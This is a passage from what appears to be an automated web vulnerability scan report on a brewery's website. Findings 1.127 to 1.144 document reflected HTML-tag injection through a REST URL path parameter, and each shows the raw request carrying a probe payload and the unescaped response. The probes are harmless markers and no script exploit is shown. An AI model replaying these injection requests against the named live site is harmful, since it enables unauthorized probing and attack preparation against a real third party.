X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookc518f"><a>4156b07e886_page" class="facebookc518f">
...[SNIP]...

1.127. http://www.ninkasibrewing.com/facebook/content/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e10"><a>2532c6c50e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook21e10"><a>2532c6c50e8/content/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook21e10"><a>2532c6c50e8_page" class="facebook21e10">
...[SNIP]...

1.128. http://www.ninkasibrewing.com/facebook/content/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8c9b"><a>1c3467f82f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookb8c9b"><a>1c3467f82f1/content/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookb8c9b"><a>1c3467f82f1_page" class="facebookb8c9b">
...[SNIP]...

1.129. http://www.ninkasibrewing.com/facebook/content/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7836"><a>bb24dd3b3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf7836"><a>bb24dd3b3b/content/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf7836"><a>bb24dd3b3b_page" class="facebookf7836">
...[SNIP]...

1.130. http://www.ninkasibrewing.com/facebook/content/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67062"><a>59511a09909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook67062"><a>59511a09909/content/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook67062"><a>59511a09909_page" class="facebook67062">
...[SNIP]...

1.131. http://www.ninkasibrewing.com/facebook/content/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fe0"><a>2eb4b172801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook31fe0"><a>2eb4b172801/content/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook31fe0"><a>2eb4b172801_page" class="facebook31fe0">
...[SNIP]...

1.132. http://www.ninkasibrewing.com/facebook/content/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d2"><a>1133f8e8031 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf53d2"><a>1133f8e8031/content/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookf53d2"><a>1133f8e8031_page" class="facebookf53d2">
...[SNIP]...

1.133. http://www.ninkasibrewing.com/facebook/content/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704d2"><a>ebeab4721f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook704d2"><a>ebeab4721f5/content/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook704d2"><a>ebeab4721f5_page" class="facebook704d2">
...[SNIP]...

1.134. http://www.ninkasibrewing.com/facebook/content/css/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1594"><a>1401768ab81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka1594"><a>1401768ab81/content/css/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebooka1594"><a>1401768ab81_page" class="facebooka1594">
...[SNIP]...

1.135. http://www.ninkasibrewing.com/facebook/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f005"><a>fa78dd29b61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook9f005"><a>fa78dd29b61/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook9f005"><a>fa78dd29b61_page" class="facebook9f005">
...[SNIP]...

1.136. http://www.ninkasibrewing.com/facebook/content/css/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe47"><a>8cda79bb80c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbbe47"><a>8cda79bb80c/content/css/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookbbe47"><a>8cda79bb80c_page" class="facebookbbe47">
...[SNIP]...

1.137. http://www.ninkasibrewing.com/facebook/content/css/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8ba"><a>7af1c205d94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7b8ba"><a>7af1c205d94/content/css/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook7b8ba"><a>7af1c205d94_page" class="facebook7b8ba">
...[SNIP]...

1.138. http://www.ninkasibrewing.com/facebook/content/css/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ab5"><a>a58806edc78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook44ab5"><a>a58806edc78/content/css/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook44ab5"><a>a58806edc78_page" class="facebook44ab5">
...[SNIP]...

1.139. http://www.ninkasibrewing.com/facebook/content/css/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbed"><a>dadadead8f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookfbbed"><a>dadadead8f3/content/css/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookfbbed"><a>dadadead8f3_page" class="facebookfbbed">
...[SNIP]...

1.140. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 233db"><a>e5397f42874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook233db"><a>e5397f42874/content/css/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook233db"><a>e5397f42874_page" class="facebook233db">
...[SNIP]...

1.141. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768c"><a>f97c43a5168 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook6768c"><a>f97c43a5168/content/css/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook6768c"><a>f97c43a5168_page" class="facebook6768c">
...[SNIP]...

1.142. http://www.ninkasibrewing.com/facebook/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bc93"><a>f6122ef7935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook5bc93"><a>f6122ef7935/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebook5bc93"><a>f6122ef7935_page" class="facebook5bc93">
...[SNIP]...

1.143. http://www.ninkasibrewing.com/facebook/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ebb"><a>62bdc34784c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookb2ebb"><a>62bdc34784c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="facebookb2ebb"><a>62bdc34784c_page" class="facebookb2ebb">
...[SNIP]...

1.144. http://www.ninkasibrewing.com/facebook/content/img/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/facebook/content/img/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124c"><a>a5d48e2d007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke124c"><a>a5d48e2d007/content/img/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
